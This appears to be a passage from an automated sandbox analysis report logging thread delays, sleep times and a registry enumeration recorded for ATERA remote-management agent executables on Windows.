Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598860
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598739
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598610
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598485
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598360
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598235
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 598110
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597985
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597860
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597735
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597621
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597500
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597391
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597266
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597141
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 597030
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596922
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596791
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596681
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596573
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596464
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596346
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596219
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 596105
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595957
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595828
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595699
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595578
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595450
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595321
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595203
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 595094
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594983
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594868
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594750
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594630
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594500
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594391
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594282
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594157
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 594032
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 593907
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Thread delayed: delay time: 593782
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Window / User API: threadDelayed 6168
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Window / User API: threadDelayed 3571
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Window / User API: threadDelayed 6218
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Window / User API: threadDelayed 3388
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Window / User API: threadDelayed 7189
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Window / User API: threadDelayed 2684
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Window / User API: threadDelayed 5352
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Window / User API: threadDelayed 4483
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Window / User API: threadDelayed 2866
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Window / User API: threadDelayed 2721
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Window / User API: threadDelayed 4715
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Window / User API: threadDelayed 2496
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Window / User API: threadDelayed 1002
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Window / User API: threadDelayed 739
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Window / User API: threadDelayed 6741
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe	Window / User API: threadDelayed 3048
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Window / User API: threadDelayed 2854
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Window / User API: threadDelayed 6883
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Window / User API: threadDelayed 5675
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	Window / User API: threadDelayed 4137
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Window / User API: threadDelayed 4126
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe	Window / User API: threadDelayed 1531

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe

Registry key enumerated: More than 126 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\SysWOW64\rundll32.exe TID: 6656	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 928	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4544	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5652	Thread sleep count: 6168 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5652	Thread sleep count: 3571 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7388	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7420	Thread sleep time: -70000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7436	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7408	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7468	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7736	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7884	Thread sleep count: 6218 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8112	Thread sleep count: 37 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8112	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8112	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7876	Thread sleep count: 3388 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8144	Thread sleep time: -100000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8140	Thread sleep time: -180000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7200	Thread sleep count: 7189 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7220	Thread sleep count: 2684 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep count: 33 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -599875s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -599765s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -599656s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -599547s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -599437s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -599328s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -599218s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -599109s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598986s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598873s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598765s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598650s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598547s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598437s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598325s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598218s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -598109s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597999s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597890s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597781s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597671s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597562s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597453s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597343s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597234s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597125s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -597015s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596905s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596796s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596687s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596572s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596468s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596359s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596249s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596140s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -596031s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -595922s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -595812s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1196	Thread sleep time: -595703s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep count: 41 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 2232	Thread sleep count: 5352 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599890s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 2232	Thread sleep count: 4483 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599781s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599672s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599562s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599453s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599343s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599234s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599125s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -599015s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598906s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598795s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598687s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598578s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598468s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598359s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598250s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598138s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -598031s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597909s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597781s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597671s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597562s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597452s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597343s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597234s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597125s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -597015s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596906s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596797s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596678s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596562s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596453s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596343s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596234s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596125s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -596015s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595906s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595797s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595687s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595578s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595462s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595358s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595248s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595117s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -595015s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -594905s >= -30000s
